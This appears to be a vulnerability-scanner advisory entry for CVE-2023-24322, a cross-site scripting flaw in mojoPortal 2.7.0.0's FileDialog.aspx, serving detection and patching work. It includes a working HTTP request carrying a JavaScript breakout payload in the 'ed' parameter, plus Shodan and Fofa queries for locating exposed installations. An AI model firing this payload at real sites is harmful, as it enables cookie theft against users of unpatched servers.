| Title | mojoPortal 2.7.0.0 - Cross-Site Scripting |
|---|---|
| Author | pikpikcu |
| Severity | Medium |
| Impact | Unauthenticated attackers can inject malicious JavaScript through the ed and tbi parameters in FileDialog.aspx to steal user session cookies and execute attacks against mojoPortal users. |
| Remediation | Upgrade to a patched version of mojoPortal or apply the necessary security patches to mitigate the XSS vulnerability. |
| CVSS Score | 6.1 |
| EPSS Score | 0.19147 |
| CVE ID | CVE-2023-24322 |
| CWE ID | CWE-79 |
| Shodan Query | html:"mojoPortal"http.html:"mojoportal" |
| Fofa Query | body="mojoportal" |
| Tags | cve cve2023 cves mojoportal xss vuln |
mojoPortal 2.7.0.0 contains a cross-site scripting vulnerability in the FileDialog.aspx component, which can allow an attacker to execute arbitrary web scripts or HTML via a crafted payload injected into the ed and tbi parameters.
GET /Dialog/FileDialog.aspx?ed=foooooooooooooo%27);});});javascript:alert('document.domain');//g HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-24322.yaml
🦈 Packet Capture: ⬇️ Download cve-2023-24322.pcap
N/AN/A